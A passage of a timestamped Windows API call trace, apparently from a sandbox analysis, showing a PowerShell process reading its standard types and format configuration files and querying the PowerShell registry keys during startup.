	[0579.405] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.405] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.406] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.406] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.406] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.407] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1000, lpOverlapped=0x0) returned 1
	[0579.407] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x1b4, lpOverlapped=0x0) returned 1
	[0579.407] ReadFile (in: hFile=0x32c, lpBuffer=0x2c82170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd048, lpOverlapped=0x0 | out: lpBuffer=0x2c82170*, lpNumberOfBytesRead=0xcd048*=0x0, lpOverlapped=0x0) returned 1
	[0579.407] CloseHandle (hObject=0x32c) returned 1
	[0579.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0579.407] SetErrorMode (uMode=0x1) returned 0x1
	[0579.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfc0 | out: lpFileInformation=0xccfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0579.407] SetErrorMode (uMode=0x1) returned 0x1
	[0579.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0579.408] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0a8 | out: phkResult=0xcd0a8*=0x32c) returned 0x0
	[0579.408] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd02c, lpData=0x0, lpcbData=0xcd028*=0x0 | out: lpType=0xcd02c*=0x1, lpData=0x0, lpcbData=0xcd028*=0x56) returned 0x0
	[0579.408] CoTaskMemAlloc (cb=0x5a) returned 0x1b3e2030
	[0579.408] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccffc, lpData=0x1b3e2030, lpcbData=0xccff8*=0x56 | out: lpType=0xccffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccff8*=0x56) returned 0x0
	[0579.408] CoTaskMemFree (pv=0x1b3e2030) 
	[0579.408] RegCloseKey (hKey=0x32c) returned 0x0
	[0579.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0579.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0584.386] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.419] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.420] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.421] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.422] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.423] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.425] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.959] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.961] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.974] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.985] VirtualQuery (in: lpAddress=0xcbd90, lpBuffer=0xccc50, dwLength=0x30 | out: lpBuffer=0xccc50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0589.709] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0589.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.710] CoTaskMemFree (pv=0x2a8780) 
	[0590.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x2f0) returned 0x0
	[0590.998] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0xcd25c, lpData=0x0, lpcbData=0xcd258*=0x0 | out: lpType=0xcd25c*=0x1, lpData=0x0, lpcbData=0xcd258*=0x74) returned 0x0
	[0590.998] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x74) returned 0x0
	[0590.998] CoTaskMemAlloc (cb=0x78) returned 0x2459d0
	[0590.998] RegQueryValueExW (in: hKey=0x2f0, lpValueName="path", lpReserved=0x0, lpType=0xcd19c, lpData=0x2459d0, lpcbData=0xcd198*=0x74 | out: lpType=0xcd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd198*=0x74) returned 0x0
	[0590.998] CoTaskMemFree (pv=0x2459d0) 
	[0590.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0590.998] SetErrorMode (uMode=0x1) returned 0x1
	[0590.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0590.999] SetErrorMode (uMode=0x1) returned 0x1
	[0591.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0591.000] SetErrorMode (uMode=0x1) returned 0x1
	[0591.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0591.000] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0591.001] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0591.001] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0591.001] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0591.001] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0591.001] SetErrorMode (uMode=0x1) returned 0x1
	[0591.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0591.002] SetErrorMode (uMode=0x1) returned 0x1
	[0591.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0591.002] SetErrorMode (uMode=0x1) returned 0x1
	[0591.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0591.002] SetErrorMode (uMode=0x1) returned 0x1
	[0591.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0591.003] SetErrorMode (uMode=0x1) returned 0x1
	[0591.003] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0591.003] SetErrorMode (uMode=0x1) returned 0x1
	[0591.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0591.003] SetErrorMode (uMode=0x1) returned 0x1
	[0591.003] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0591.003] SetErrorMode (uMode=0x1) returned 0x1
	[0591.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0591.004] SetErrorMode (uMode=0x1) returned 0x1
	[0591.004] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0591.004] SetErrorMode (uMode=0x1) returned 0x1
	[0591.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0591.004] SetErrorMode (uMode=0x1) returned 0x1
	[0591.004] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0591.004] SetErrorMode (uMode=0x1) returned 0x1
	[0591.005] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0591.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.005] CoTaskMemFree (pv=0x2a8780) 
	[0592.307] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0592.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.307] CoTaskMemFree (pv=0x2a8780) 
	[0592.308] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0592.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.308] CoTaskMemFree (pv=0x2a8780) 
	[0592.310] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0592.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.310] CoTaskMemFree (pv=0x2a8780) 
	[0592.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.311] SetErrorMode (uMode=0x1) returned 0x1
	[0592.311] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0592.311] GetFileType (hFile=0x2f4) returned 0x1
	[0592.311] SetErrorMode (uMode=0x1) returned 0x1
	[0592.311] GetFileType (hFile=0x2f4) returned 0x1
	[0592.312] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.315] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.315] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.316] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.316] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.316] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.317] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0592.317] ReadFile (in: hFile=0x2f4, lpBuffer=0x32ba062, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32ba062*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.317] ReadFile (in: hFile=0x2f4, lpBuffer=0x32bab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x32bab18*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0592.317] CloseHandle (hObject=0x2f4) returned 1
	[0592.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.317] SetErrorMode (uMode=0x1) returned 0x1
	[0592.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0592.317] SetErrorMode (uMode=0x1) returned 0x1
	[0592.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0592.318] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f4) returned 0x0
